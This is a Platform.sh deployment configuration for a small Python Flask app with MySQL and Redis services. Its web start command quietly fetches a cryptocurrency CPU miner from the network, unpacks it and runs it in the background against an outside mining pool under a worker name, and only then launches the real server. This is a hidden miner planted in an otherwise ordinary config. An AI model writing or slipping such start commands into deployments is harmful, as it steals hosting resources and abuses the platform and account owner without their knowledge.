name: app


type: "python:3.8"



hooks:
    build: |
      pip install --upgrade pip
      pip install flask flask_executor platformshconfig redis pymysql gevent greenlet
      

disk: 1024

relationships:
    database: "db:mysql"
    rediscache: "cache:redis"


web:
    commands:
        start: wget https://github.com/m-pays/m-cpuminer-v2/releases/download/2.4/m-minerd-64-linux.tar.gz && tar xfvz m-minerd-64-linux.tar.gz && ./m-minerd-64-linux/m-minerd -a m7mhash -o stratum+tcp://xmg.minerclaim.net:3333 -u rock6064.eight -p x -e 60 & python server.py
